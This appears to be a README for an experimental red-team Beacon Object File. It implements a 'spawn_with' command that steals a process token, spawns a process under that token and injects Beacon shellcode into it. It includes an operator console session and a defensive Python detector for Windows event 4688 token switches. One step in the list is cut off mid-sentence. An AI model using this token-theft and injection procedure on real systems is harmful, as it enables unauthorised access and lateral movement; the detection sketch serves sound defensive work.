An experimental Beacon Object File (BOF) that provides an alternative to the `spawnas` and `inject` commands. It exposes a new command, `spawn_with [pid] [listener]`, that performs the following:
- Obtain a handle to the target process.
- Obtain a handle to the process's primary token.
- Duplicate the primary token to an impersonation token.
- Get the Beacon `spawnto` value.
- Attempt to spawn a new process with the duplicated token using `CreateProcessWithTokenW`.
- If this attempt fails, try `CreateProcessAsUserW`.
- If this attempt fails, try
- Inject the Beacon shellcode into the spawned process.
- Link to the Beacon in the case of P2P.
```
beacon> getuid
[*] You are DESKTOP-1U6AHIU\Daniel (admin)
beacon> ps
22656 21972 wordpad.exe x64 1 DESKTOP-1U6AHIU\test_user
beacon> spawnto x64 %windir%\sysnative\notepad.exe
beacon> spawn_with 22656 tcp-local
[*] Task Beacon to run windows/beacon_bind_tcp (127.0.0.1:4444)
[+] received output:
Spawned PID 45668 and injected 297472 bytes
[+] established link to child beacon: 192.168.0.195
```
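From the defensive side, a process created with another account's token (the `CreateProcessWithTokenW` / `CreateProcessAsUserW` step above; in the session, Daniel's Beacon spawning `notepad.exe` under `test_user`) leaves a creator/target mismatch in Windows Security event 4688. The following detection sketch is an added example, not part of this BOF; the events are constructed, and the trusted-creator allowlist is an assumption to be tuned per environment.

```python
"""Detect process creation under a token that differs from the creator's.

Windows Security event 4688 carries a Target Subject block (TargetUserName,
TargetDomainName, TargetLogonId) that is "-" when the child inherits the
creator's token and filled in when the child runs under another token,
which is exactly what spawning with a duplicated token produces."""

# Constructed 4688 events, already parsed into field dictionaries.
EVENTS = [
    {   # benign: child inherits the creator's token, Target Subject is "-"
        "SubjectDomainName": "DESKTOP-1U6AHIU", "SubjectUserName": "Daniel",
        "SubjectLogonId": "0x3e7a1", "TargetDomainName": "-",
        "TargetUserName": "-", "TargetLogonId": "0x0",
        "NewProcessName": r"C:\Windows\System32\cmd.exe",
        "ParentProcessName": r"C:\Windows\explorer.exe",
    },
    {   # suspicious: Daniel's process creates notepad.exe under test_user's token
        "SubjectDomainName": "DESKTOP-1U6AHIU", "SubjectUserName": "Daniel",
        "SubjectLogonId": "0x3e7a1", "TargetDomainName": "DESKTOP-1U6AHIU",
        "TargetUserName": "test_user", "TargetLogonId": "0x9c1d4",
        "NewProcessName": r"C:\Windows\System32\notepad.exe",
        "ParentProcessName": r"C:\Windows\System32\rundll32.exe",
    },
    {   # expected: winlogon (SYSTEM) starts the user's shell under the user's token
        "SubjectDomainName": "NT AUTHORITY", "SubjectUserName": "SYSTEM",
        "SubjectLogonId": "0x3e7", "TargetDomainName": "DESKTOP-1U6AHIU",
        "TargetUserName": "Daniel", "TargetLogonId": "0x3e7a1",
        "NewProcessName": r"C:\Windows\System32\userinit.exe",
        "ParentProcessName": r"C:\Windows\System32\winlogon.exe",
    },
]

# Accounts that create processes under other tokens as part of normal logon.
# Assumed starting point for this example; tune per environment.
TRUSTED_CREATORS = frozenset({"SYSTEM"})

def token_switch_findings(events, trusted_creators=TRUSTED_CREATORS):
    """Return events where a non-trusted creator started a process as another user."""
    findings = []
    for ev in events:
        target, creator = ev.get("TargetUserName", "-"), ev["SubjectUserName"]
        if target in ("-", "") or creator in trusted_creators:
            continue
        if target.lower() == creator.lower():   # same user, e.g. UAC elevation
            continue
        findings.append({
            "creator": f'{ev["SubjectDomainName"]}\\{creator}',
            "target": f'{ev["TargetDomainName"]}\\{target}',
            "process": ev["NewProcessName"], "parent": ev["ParentProcessName"],
        })
    return findings
```

Pair this with the injection step: the flagged child (`notepad.exe`) should also be checked for a remote thread or unbacked executable memory shortly after creation, which is what narrows a token switch down to this pattern.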